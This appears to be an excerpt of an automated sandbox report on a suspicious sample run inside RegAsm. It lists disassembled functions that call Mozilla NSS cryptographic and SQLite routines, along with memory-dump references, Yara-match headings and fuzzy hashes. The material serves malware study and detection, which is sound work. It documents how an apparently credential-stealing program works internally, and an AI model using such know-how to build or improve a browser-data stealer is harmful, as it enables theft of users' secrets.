                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3099930812-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 457f95d425ff8579f573d6dca0f4886f4d1833ef28a55d566858e9a4949325cb
                                                                                                                                                                                                                                                                  • Instruction ID: 6ea3fad9e467bbecef6a9e2a918f74406e7a6d78594025b548e0e9c1aa0f586f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 457f95d425ff8579f573d6dca0f4886f4d1833ef28a55d566858e9a4949325cb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92419D71A00108AFDF24DFA4DD41AEF7BB6EB94318F10403AF901B21A1D7389E54DB98
                                                                                                                                                                                                                                                                  Function 6C95AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C95AB3E,?,?,?), ref: 6C95AC35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C93CF16
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C95AB3E,?,?,?), ref: 6C95AC55
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E,?,?), ref: 6C95AC70
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E33C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E350
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PR_Unlock.NSS3(?), ref: 6C93E5BC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C93E5CA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E5F2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E606
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PORT_Alloc_Util.NSS3(?), ref: 6C93E613
                                                                                                                                                                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C95AC92
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E), ref: 6C95ACD7
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C95AD10
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C95AD2B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: TlsGetValue.KERNEL32(00000000,?,6C95A904,?), ref: 6C93F38B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: EnterCriticalSection.KERNEL32(?,?,?,6C95A904,?), ref: 6C93F3A0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: PR_Unlock.NSS3(?,?,?,?,6C95A904,?), ref: 6C93F3D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                  • Opcode ID: ac4671c46ef319fea7bb9953b248456edcdc1e9a5c48c0b4a08ef66bf6987436
                                                                                                                                                                                                                                                                  • Instruction ID: e1f08670bf30c52dadd48cef5a3abcc00a54ce30a679c56a836183a6038f5b54
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac4671c46ef319fea7bb9953b248456edcdc1e9a5c48c0b4a08ef66bf6987436
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F3149B1E006165FEB00CF25CC409BF777AAF94318B588128E8199B740EF31DC2587B5
                                                                                                                                                                                                                                                                  Function 004114D4 Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004114D9
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411504
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0042654C,00000001,?,?,?,00000000), ref: 00411547
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426548,00000001,?,?,?,00000000), ref: 00411575
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426544,00000001,?,?,?,00000000), ref: 0041159A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426540,00000001,?,?,?,00000000), ref: 004115CB
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411601
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1158113254-0
                                                                                                                                                                                                                                                                  • Opcode ID: a915869681dffa16933a65342faae8ae5a5a6b5ec651aded4b31f4716f22f657
                                                                                                                                                                                                                                                                  • Instruction ID: f237043460811e072b7e6b89c98a285f3bae0998e265c3c15e61c81d453236ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a915869681dffa16933a65342faae8ae5a5a6b5ec651aded4b31f4716f22f657
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB41AF70A00506ABCB14CF64C981BEAB7F9BB85305F10442FE602E65A1DB3CCA818B49
                                                                                                                                                                                                                                                                  Function 6C938C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C938C7C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C938CB0
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C938CD1
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C938CE5
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C938D2E
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C938D62
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C938D93
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6733c4e54765902a508dbaac80329090df874a7ace335826f89db5eaa1649151
                                                                                                                                                                                                                                                                  • Instruction ID: 42b24b91fc9cddb128c8f8ca5b2096001617be176b4ca1ecaf90105ed9e6b0b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6733c4e54765902a508dbaac80329090df874a7ace335826f89db5eaa1649151
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE316871A00221AFDB099F68CC44BAAB7B4BF64318F14113BEA2DA7B50D730E915CBD5
                                                                                                                                                                                                                                                                  Function 6C96DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC30
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC4E
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC5A
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C96DC7E
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C96DCAD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                  • Opcode ID: 101d8d52ca9c49a4eacd53696419601dd10658d83e4635fae68aaaf00f07a3ec
                                                                                                                                                                                                                                                                  • Instruction ID: f980541b80d43c0c57877b114d6efad610160244857c042e36c3b8a8dd8899ba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 101d8d52ca9c49a4eacd53696419601dd10658d83e4635fae68aaaf00f07a3ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C318FB69002049FE750CF1AD884A92B7F8AF1535CF248028E95CCBB80E775E944CBA1
                                                                                                                                                                                                                                                                  Function 6C928C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C928C1B
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C928C34
                                                                                                                                                                                                                                                                  • PL_ArenaAllocate.NSS3 ref: 6C928C65
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C928C9C
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C928CB6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                  • String ID: KRAM
                                                                                                                                                                                                                                                                  • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                  • Opcode ID: c6aeca87de2ac4dc2bd189ecf4527a948689a8b421a472ea2cd85e8238ccabf1
                                                                                                                                                                                                                                                                  • Instruction ID: d56b621d6b6584c5a9aa95d884a77b0a4ed8f2f12c649bbfadd41f659cd475d8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6aeca87de2ac4dc2bd189ecf4527a948689a8b421a472ea2cd85e8238ccabf1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF217EB26156118FD704EF38C484569BBF4FF55308F05896ED8C88B705EB39D886CB95
                                                                                                                                                                                                                                                                  Function 6CA22C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6CA22CA0
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6CA22CBE
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000014), ref: 6CA22CD1
                                                                                                                                                                                                                                                                  • strdup.MOZGLUE(?), ref: 6CA22CE1
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CA22D27
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Loaded library %s (static lib), xrefs: 6CA22D22
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                  • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                  • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                  • Opcode ID: 04440f78faec74f62a8bb41a8bd7379a42fde43b8c70a43e3c00db15bc380aa1
                                                                                                                                                                                                                                                                  • Instruction ID: 12204d2837d1120dca2d66af6cf6eb84a8d483c9b46e8d1e1a92c65e50408963
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04440f78faec74f62a8bb41a8bd7379a42fde43b8c70a43e3c00db15bc380aa1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B91100B86103219FEB099F15D808AA637B5AB5532DF1CC23DD80987B01D735E88ACBB1
                                                                                                                                                                                                                                                                  Function 6C9A1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C9A1C74
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 6C9A1C92
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C9A1C99
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 6C9A1CCB
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C9A1CD2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3805613680-0
                                                                                                                                                                                                                                                                  • Opcode ID: bf16a5e22f6d28bea6198626a4f54c0e390b9b0cb4b213470fdf0e9f5d567eb9
                                                                                                                                                                                                                                                                  • Instruction ID: 68714124730618012870f290d5d793e5728f7a3d872b53d353b9ff63ec08c4a0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf16a5e22f6d28bea6198626a4f54c0e390b9b0cb4b213470fdf0e9f5d567eb9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A01C0B5F01776EFDF29AFA49C0DB4A37B8B717309F004225E90AA2A40D330D11787A1
                                                                                                                                                                                                                                                                  Function 6CA01C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C903D77,?,?,6C904E1D), ref: 6CA01C8A
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6CA01CB6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                  • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                                                                                  • API String ID: 1840970956-3705377941
                                                                                                                                                                                                                                                                  • Opcode ID: ad30f7327752598c076c6e8cba701a771f34a1e142a55999ba5f6fadac8a2daa
                                                                                                                                                                                                                                                                  • Instruction ID: 4971e7ef87a4660e0be8c68a96dbbee68885d04723637c60f13aa182438d9dc7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad30f7327752598c076c6e8cba701a771f34a1e142a55999ba5f6fadac8a2daa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22014CB1B001404BD710BB2CD4029B273E5EF8138CB14487DED49DBB02EB21E897C751
                                                                                                                                                                                                                                                                  Function 6C97CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C97DAE2,?), ref: 6C97C6C2
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C97CD35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                    • Part of subcall function 6C966C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C97CD54
